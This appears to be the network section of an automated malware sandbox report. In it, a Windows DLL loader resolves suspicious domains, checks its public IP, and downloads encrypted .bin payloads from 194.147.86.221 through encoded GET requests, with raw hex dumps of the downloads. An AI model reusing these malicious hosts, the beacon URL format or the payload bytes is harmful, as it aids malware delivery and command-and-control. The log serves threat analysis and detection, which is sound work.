                                                          Oct 7, 2021 01:32:20.886065006 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.886424065 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:20.918912888 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:20.980824947 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.292851925 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.292890072 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.293133020 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.544200897 CEST4977980192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568727970 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568784952 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568821907 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568861008 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568875074 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568897009 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568914890 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.568938971 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568977118 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.568990946 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.569017887 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569056988 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569072008 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.569092989 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.569140911 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:21.592881918 CEST8049779194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618634939 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618660927 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618678093 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618695021 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618711948 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618736982 CEST8049780194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:21.618752003 CEST4978080192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.641149044 CEST4986380192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:34:10.690242052 CEST8049863194.147.86.221192.168.2.4

                                                          UDP Packets

                                                          Timestamp                            Source Port  Dest Port  Source IP       Dest IP

                                                          DNS Queries

                                                          Timestamp                            Source IP    Dest IP         Trans ID  OP Code             Name                               Type                  Class
                                                          Oct 7, 2021 01:32:17.880515099 CEST  192.168.2.4  8.8.8.8         0x2a0e    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:18.824342966 CEST  192.168.2.4  8.8.8.8         0x4731    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:18.980140924 CEST  192.168.2.4  8.8.8.8         0xa7a5    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:20.480238914 CEST  192.168.2.4  8.8.8.8         0x46cb    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:20.812315941 CEST  192.168.2.4  8.8.8.8         0x2650    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:23.312601089 CEST  192.168.2.4  8.8.8.8         0x5791    Standard query (0)  init.icecreambob.com               A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:33:24.333306074 CEST  192.168.2.4  8.8.8.8         0xb091    Standard query (0)  resolver1.opendns.com              A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:33:24.362245083 CEST  192.168.2.4  208.67.222.222  0x1       Standard query (0)  222.222.67.208.in-addr.arpa        PTR (Pointer record)  IN (0x0001)
                                                          Oct 7, 2021 01:33:24.381411076 CEST  192.168.2.4  208.67.222.222  0x2       Standard query (0)  myip.opendns.com                   A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:33:24.429609060 CEST  192.168.2.4  208.67.222.222  0x3       Standard query (0)  myip.opendns.com                   28                    IN (0x0001)
                                                          Oct 7, 2021 01:34:00.486257076 CEST  192.168.2.4  8.8.8.8         0x70a8    Standard query (0)  art.microsoftsofymicrosoftsoft.at  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:34:09.717750072 CEST  192.168.2.4  8.8.8.8         0x75b     Standard query (0)  art.microsoftsofymicrosoftsoft.at  A (IP address)        IN (0x0001)

                                                          DNS Answers

                                                          Timestamp                            Source IP       Dest IP      Trans ID  Reply Code    Name                               CName  Address         Type                  Class
                                                          Oct 7, 2021 01:32:18.173275948 CEST  8.8.8.8         192.168.2.4  0x2a0e    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:19.161839008 CEST  8.8.8.8         192.168.2.4  0x4731    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:19.289130926 CEST  8.8.8.8         192.168.2.4  0xa7a5    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:20.772708893 CEST  8.8.8.8         192.168.2.4  0x46cb    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:20.830039024 CEST  8.8.8.8         192.168.2.4  0x2650    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:32:23.618545055 CEST  8.8.8.8         192.168.2.4  0x5791    No error (0)  init.icecreambob.com               -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:33:24.352554083 CEST  8.8.8.8         192.168.2.4  0xb091    No error (0)  resolver1.opendns.com              -      208.67.222.222  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST  208.67.222.222  192.168.2.4  0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -               PTR (Pointer record)  IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST  208.67.222.222  192.168.2.4  0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -               PTR (Pointer record)  IN (0x0001)
                                                          Oct 7, 2021 01:33:24.379193068 CEST  208.67.222.222  192.168.2.4  0x1       No error (0)  222.222.67.208.in-addr.arpa        -      -               PTR (Pointer record)  IN (0x0001)
                                                          Oct 7, 2021 01:33:24.399873972 CEST  208.67.222.222  192.168.2.4  0x2       No error (0)  myip.opendns.com                   -      102.129.143.57  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:34:00.780658960 CEST  8.8.8.8         192.168.2.4  0x70a8    No error (0)  art.microsoftsofymicrosoftsoft.at  -      194.147.86.221  A (IP address)        IN (0x0001)
                                                          Oct 7, 2021 01:34:10.070925951 CEST  8.8.8.8         192.168.2.4  0x75b     No error (0)  art.microsoftsofymicrosoftsoft.at  -      194.147.86.221  A (IP address)        IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • init.icecreambob.com
                                                          • art.microsoftsofymicrosoftsoft.at

                                                          HTTP Packets

                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                          0           192.168.2.4  49776        194.147.86.221  80                C:\Windows\System32\loaddll32.exe
                                                          Timestamp                            kBytes transferred  Direction  Data
                                                          Oct 7, 2021 01:32:18.233037949 CEST  1596                OUT        GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:18.712804079 CEST  1597                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:18 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3202a5f19.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                          1           192.168.2.4  49777        194.147.86.221  80                C:\Windows\System32\loaddll32.exe
                                                          Timestamp                            kBytes transferred  Direction  Data
                                                          Oct 7, 2021 01:32:19.242465973 CEST  1800                OUT        GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.686741114 CEST  1802                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 194704
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203a062c.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          2          | 192.168.2.4 | 49778       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:19.340179920 CEST | 1801 | OUT | GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:19.811055899 CEST | 1894 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3203bb666.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 
a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza
                                                          Oct 7, 2021 01:32:19.811140060 CEST1895INData Raw: 48 57 a9 2f 4c a2 4c 07 a3 1c 0f 34 9e a5 7a 23 91 f3 40 11 49 37 98 44 60 59 20 08 3d 94 df aa 6d 3b 7c f7 f7 89 91 f9 f1 f8 02 a8 c2 7c f4 d7 51 a4 cd 5e d0 e3 0b a4 17 ed 15 e5 93 70 53 b8 3d 71 04 2d 5f 39 37 24 85 22 cf 75 7e 96 87 dd 4f c3
                                                          Data Ascii: HW/LL4z#@I7D`Y =m;||Q^pS=q-_97$"u~OuhhqN N1tt.<n*(cY=`"DAi(%80X\m[bW+AC5*O/QXYb52'hKi:)l,-<P; b7BxXK|
                                                          Oct 7, 2021 01:32:19.811191082 CEST1897INData Raw: f2 80 cf 6d a8 ee f3 d2 ba 7c b3 24 3d 68 9a 82 2a 60 85 2f dc 11 f3 d3 53 ff cf 00 22 25 84 f9 25 54 51 bc 26 8a e6 16 82 c7 02 c2 f9 7c 30 8d 61 26 49 dd 0b 63 d3 f4 93 5e 67 94 0c c9 eb cf ab 72 26 07 fb 74 0e 66 1e f1 ee 28 c6 fc 13 19 4b 97
                                                          Data Ascii: m|$=h*`/S"%%TQ&|0a&Ic^gr&tf(KI#wK%uF>S"P[kD8,{)0S;CYA7r"Jx[Rhz\2Fpw8s,xgv<w.m= FFNjdNT,du$b{V
                                                          Oct 7, 2021 01:32:19.811217070 CEST1898INData Raw: f7 a9 67 36 b4 35 60 67 f6 b3 db 15 02 ca ef 82 02 39 86 36 eb 97 f4 19 b3 df ac 62 79 69 23 ae 4c 1c d9 f8 27 40 b4 ca 71 24 2b 94 ca bd 11 6b f7 10 a9 57 cb 80 17 85 45 f2 c2 97 d6 60 b4 9f da ef 9d 19 ca 58 d9 3f f3 af c7 a0 08 d3 ed f8 a6 ce
                                                          Data Ascii: g65`g96byi#L'@q$+kWE`X?VCI` 0U[U;5;S*7W(I pt*G/-[/B4,(W%HG||8hBuK{^m~o:n\70hGUu!J
                                                          Oct 7, 2021 01:32:19.811242104 CEST1899INData Raw: 1f a2 bb 51 3b 3b fc 03 f3 ac d4 b2 e7 2c 28 a1 18 08 b3 40 1a fb 48 43 76 af 34 5d 1f 25 c1 ed 85 84 e5 2a 1f ca d1 1d 78 84 e8 b3 e4 39 8f c5 cc fd 7f 5c 44 6f d0 96 b3 d9 0a 77 fd bb 0d 18 7c 91 b3 ff a9 e8 20 77 65 62 39 86 d3 d1 13 a1 a1 5e
                                                          Data Ascii: Q;;,(@HCv4]%*x9\Dow| web9^knwi3=*)CN"/.#l$|~0|LV0H..UgMA P29N=w|<7}vBR
                                                          Oct 7, 2021 01:32:19.811264992 CEST1901INData Raw: 72 1f ff f6 60 fd f7 af fb b2 94 3f 3f fe 24 83 55 06 5d d1 16 b2 14 fe e2 a8 f5 b7 f9 fa 35 c2 01 b5 da ed d8 e6 e3 fd 5b f2 04 7c 81 bc 81 8f 4c 4e fe 08 7a d9 e1 b6 f8 58 54 db c0 9d 4d 10 7e 6d ed d4 81 d8 ae 8c 91 d4 5f 2d e0 20 d7 89 6c a9
                                                          Data Ascii: r`??$U]5[|LNzXTM~m_- lg>X!?Q{b~Dz/Zu'.X+&n/ }|E&sa?^EPNyv=Jj{89snvU"VC!36
                                                          Oct 7, 2021 01:32:19.811290026 CEST1902INData Raw: 5f 8e fc e9 8a 59 e6 f4 27 6c f8 76 c5 36 39 7a e2 d8 88 b4 a0 1c bf 59 4e 8e 99 c9 bb 4c 21 b9 be a7 0f 58 db ad ab 31 7d 59 71 00 03 51 64 80 bf 22 d9 ab e8 a6 8c b6 2f 84 a8 b6 16 ab 80 b8 05 dd 47 57 d8 29 65 19 1a d1 a6 f1 77 68 e9 73 4c a9
                                                          Data Ascii: _Y'lv69zYNL!X1}YqQd"/GW)ewhsL"^?9?mvV(d)0Rpm7?'deTy4MlbLuU4h4`-[~m]P^k{':lUQSf/v
                                                          Oct 7, 2021 01:32:19.811311960 CEST1903INData Raw: a1 1d 28 79 3f d3 2e 2b c8 94 cf 20 0a d3 cd 6f 3c 27 bf 06 32 a4 de 26 68 b0 a2 48 df 2e 1c e7 63 5f 3f 81 6b e3 e4 19 64 74 88 18 4b af 22 52 c2 20 22 a5 f2 fb a1 75 4c cd 59 19 04 95 dd 6f e6 4b 5a ce 69 1f f7 3b 78 40 97 50 13 0c 3f 3d f2 1e
                                                          Data Ascii: (y?.+ o<'2&hH.c_?kdtK"R "uLYoKZi;x@P?=(6#+~3~q-^Ke!)F="vM!Ly(BK%SMj;=V+k@*^r4I??StUey#ggZFAc9t&rEI
                                                          Oct 7, 2021 01:32:19.811336994 CEST1905INData Raw: 3f aa 73 11 0d 57 14 b7 16 27 e9 b5 75 1c 37 e0 3d 9f 68 cd d4 5b e3 4a 31 ea 34 d5 4b 4e 34 a2 06 46 ea 52 44 df 5b f3 97 aa 9a 2f 92 4c c6 4e 3b ba f4 38 30 e3 cb 30 12 7e b3 d4 4b 54 6f 34 70 7e 90 94 76 cf 46 44 91 41 c0 d1 f6 42 61 c9 10 b3
                                                          Data Ascii: ?sW'u7=h[J14KN4FRD[/LN;800~KTo4p~vFDABa*cL(]D=A=p(j%v/hkvvKB^<s0:sNDg9e?ddIT}PA %gXr7(/IH[E!EdT]O"
                                                          Oct 7, 2021 01:32:19.824913025 CEST1906INData Raw: 1a 93 14 95 99 66 8e c9 d5 22 0f 0f 14 4f 08 4d 3b 95 ee 45 02 bd c4 96 f0 c3 a3 89 d8 32 21 6a ae 05 b7 1b 73 76 b7 a5 b5 12 e1 d6 bb 59 bb 7a be 71 fa f8 1e 35 4d d3 9c 92 d6 32 df e2 9c b4 24 c1 27 d4 68 b5 c7 e0 93 fe 73 cb 0a 76 72 53 61 4b
                                                          Data Ascii: f"OM;E2!jsvYzq5M2$'hsvrSaKXmcgPlL'9'"zDk"h5IA>!'6Qn =ds5}`VOts;{Mb|b7B?@QKfZbR0H1w.Ao08|*we >6^
                                                          Oct 7, 2021 01:32:19.860569000 CEST1920INData Raw: c4 6b 40 13 06 45 0a 3d 48 54 79 ff 92 84 a6 e6 01 d5 f4 11 74 8f 47 cd db d7 f7 26 22 2c a4 68 a4 29 14 96 6b 20 15 b5 ba 29 2a 95 a0 63 56 67 a6 e9 65 d2 c1 c4 b5 ad 73 3f 8a b5 1e 10 4e 99 43 a8 51 ee d5 aa 8f a8 52 10 fd 44 45 12 79 f5 9e 1f
                                                          Data Ascii: k@E=HTytG&",h)k )*cVges?NCQRDEy$,7:O Pq+U'/s*\|v$cP7xg.eH$%B2%bj]qZUEGzCEF@9J18GaapL9}NPD^az?0?P:


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          3          | 192.168.2.4 | 49779       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:20.827048063 CEST | 2263 | OUT | GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.292851925 CEST | 2265 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e32053f1dd.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 